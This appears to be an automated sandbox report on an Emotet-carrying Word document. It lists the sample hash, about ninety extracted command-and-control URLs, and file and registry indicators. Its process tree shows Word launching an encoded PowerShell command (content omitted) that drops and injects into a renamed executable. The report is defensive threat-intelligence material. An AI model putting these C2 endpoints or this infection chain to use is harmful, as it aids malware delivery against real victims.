Task: task1
Sample: Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc
Resource: win7

Task: task2
Sample: Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc
Resource: win10
General
Target: Docs_34df7390e3fba4cc8b8de327c79c3741.3
Sample: 191010-j1ayh7x2f6
SHA256: 51de13d18a23740342f1c681de4cb6c2baf116f2a4df4730c5338439d05823e4
Malware Config
Extracted family: emotet
Extracted URLs:
http://201.184.105.242:443/
http://24.45.195.162:7080/
http://24.45.195.162:8443/
http://94.192.225.46/
http://80.11.163.139:443/
http://133.167.80.63:7080/
http://198.199.114.69:8080/
http://80.79.23.144:443/
http://192.254.173.31:8080/
http://67.225.229.55:8080/
http://190.108.228.48:990/
http://62.75.187.192:8080/
http://185.94.252.13:443/
http://94.205.247.10/
http://211.63.71.72:8080/
http://59.103.164.174/
http://192.81.213.192:8080/
http://27.4.80.183:443/
http://190.145.67.134:8090/
http://115.78.95.230:443/
http://104.131.11.150:8080/
http://95.128.43.213:8080/
http://212.71.234.16:8080/
http://178.254.6.27:7080/
http://86.98.25.30:53/
http://91.205.215.66:8080/
http://188.166.253.46:8080/
http://80.11.163.139:21/
http://186.75.241.230/
http://190.106.97.230:443/
http://78.24.219.147:8080/
http://217.160.182.191:8080/
http://173.212.203.26:8080/
http://92.222.216.44:8080/
http://136.243.177.26:8080/
http://37.157.194.134:443/
http://190.211.207.11:443/
http://104.236.246.93:8080/
http://190.18.146.70/
http://103.255.150.84/
http://138.201.140.110:8080/
http://41.220.119.246/
http://200.71.148.138:8080/
http://85.54.169.141:8080/
http://144.139.247.220/
http://149.202.153.252:8080/
http://31.172.240.91:8080/
http://186.4.172.5:443/
http://178.79.161.166:443/
http://186.4.172.5:8080/
http://206.189.98.125:8080/
http://87.106.139.101:8080/
http://46.105.131.87/
http://45.123.3.54:443/
http://222.214.218.192:8080/
http://85.106.1.166:50000/
http://83.136.245.190:8080/
http://179.32.19.219:22/
http://152.89.236.214:8080/
http://181.31.213.158:8080/
http://87.106.136.232:8080/
http://47.41.213.2:22/
http://201.251.43.69:8080/
http://24.51.106.145:21/
http://87.230.19.21:8080/
http://190.228.72.244:53/
http://181.143.194.138:443/
http://182.176.106.43:995/
http://31.12.67.62:7080/
http://182.76.6.2:8080/
http://190.226.44.20:21/
http://181.143.53.227:21/
http://189.209.217.49/
http://190.186.203.55/
http://27.147.163.188:8080/
http://159.65.25.128:8080/
http://101.187.237.217:20/
http://80.11.163.139:443/
http://182.176.132.213:8090/
http://199.19.237.192/
http://124.240.198.66/
http://5.196.74.210:8080/
http://190.53.135.159:21/
http://186.4.172.5:20/
http://45.33.49.124:443/
http://92.233.128.13:143/
http://85.104.59.244:20/
http://169.239.182.217:8080/
Signatures

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Drops Office document
Processes: WINWORD.EXE
at | description | ioc | process
19329 | File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm | WINWORD.EXE
19360 | File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm | WINWORD.EXE
19360 | File created | C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | WINWORD.EXE
24570 | File opened for modification | C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc | WINWORD.EXE
25928 | File created | C:\Users\Admin\AppData\Local\Temp\~$cs_34df7390e3fba4cc8b8de327c79c3741.3.doc | WINWORD.EXE
Drops file in system dir 5 IoCs
Processes: WINWORD.EXE, powershell.exe, 320.exe
at | description | ioc | process
26848 | File deleted | C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD | WINWORD.EXE
26848 | File created | C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD | WINWORD.EXE
33775 | File opened for modification | C:\Windows\system32\GDIPFONTCACHEV1.DAT | WINWORD.EXE
34601 | File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
59640 | File renamed | C:\Users\Admin\320.exe => C:\Windows\SysWOW64\loadarouter.exe | 320.exe
Modifies registry class 1 TTPs 280 IoCs
Processes: WINWORD.EXE
(The user-hive prefix \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES is abbreviated below as USER_CLASSES.)
at | description | ioc | process
28143 | Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4} | WINWORD.EXE
28143 | Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0 | WINWORD.EXE
28143 | Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\ = "Microsoft Forms 2.0 Object Library" | WINWORD.EXE
28143 | Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS | WINWORD.EXE
28143 | Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS\ = "6" | WINWORD.EXE
28143 | Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0 | WINWORD.EXE
28143 | Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32 | WINWORD.EXE
28143 | Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" | WINWORD.EXE
28143 | Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR | WINWORD.EXE
28143 | Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" | WINWORD.EXE
28143 | Key created | USER_CLASSES\TypeLib | WINWORD.EXE
28143 | Key created | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4} | WINWORD.EXE
28143 | Key created | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0 | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\ = "Microsoft Forms 2.0 Object Library" | WINWORD.EXE
28143 | Key created | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\FLAGS\ = "6" | WINWORD.EXE
28143 | Key created | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0 | WINWORD.EXE
28143 | Key created | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32 | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" | WINWORD.EXE
28143 | Key created | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\TypeLib\{C5F43098-C1E8-4108-9098-71ACA6B5BCB4}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | WINWORD.EXE
28143 | Key created | USER_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} | WINWORD.EXE
28143 | Set value (str) | USER_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" | WINWORD.EXE
Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe
at | description | process
38096 | Token: SeDebugPrivilege | powershell.exe
Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API 1 TTPs 12 IoCs
Processes: OSPPSVC.EXE
at | description | ioc | process
43525 | Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} | OSPPSVC.EXE
43525 | Key queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} | OSPPSVC.EXE
43525 | Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs | OSPPSVC.EXE
43525 | Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid | OSPPSVC.EXE
43525 | Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID\ | OSPPSVC.EXE
43525 | Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ | OSPPSVC.EXE
43525 | Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32 | OSPPSVC.EXE
43525 | Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\InprocServer32 | OSPPSVC.EXE
43525 | Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ | OSPPSVC.EXE
43525 | Key value queried | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ThreadingModel | OSPPSVC.EXE
43525 | Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32 | OSPPSVC.EXE
43525 | Key opened | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler | OSPPSVC.EXE
Suspicious use of WriteProcessMemory 3 IoCs
Processes: powershell.exe, 320.exe, loadarouter.exe
at | description | process | target process
52791 | PID 1840 wrote to memory of 1456 | powershell.exe | 320.exe
53524 | PID 1456 wrote to memory of 1980 | 320.exe | 320.exe
60529 | PID 1268 wrote to memory of 1536 | loadarouter.exe | loadarouter.exe

Emotet Sync
Processes: 320.exe
description | ioc | process
Event created | Global\E64C019BB | 320.exe
Suspicious behavior: EmotetMutantsSpam
emotet family
Processes

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Command line: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_34df7390e3fba4cc8b8de327c79c3741.3.doc"
- Drops Office document
- Drops file in system dir
- Modifies registry class
PID: 1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -enco [encoded command omitted]
- Drops file in system dir
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1840

C:\Windows\system32\conhost.exe
Command line: \??\C:\Windows\system32\conhost.exe "802564112872273931434410250278590852-82112389151222317660531298-936447053"
PID: 1988

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
Command line: "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
- Uses Task Scheduler COM API
PID: 1940

C:\Users\Admin\320.exe
Command line: "C:\Users\Admin\320.exe"
- Suspicious use of WriteProcessMemory
PID: 1456

C:\Users\Admin\320.exe
Command line: --c73fdd8f
- Drops file in system dir
- Emotet Sync
PID: 1980

C:\Windows\SysWOW64\loadarouter.exe
Command line: "C:\Windows\SysWOW64\loadarouter.exe"
- Suspicious use of WriteProcessMemory
PID: 1268

C:\Windows\SysWOW64\loadarouter.exe
Command line: --f7a216da
PID: 1536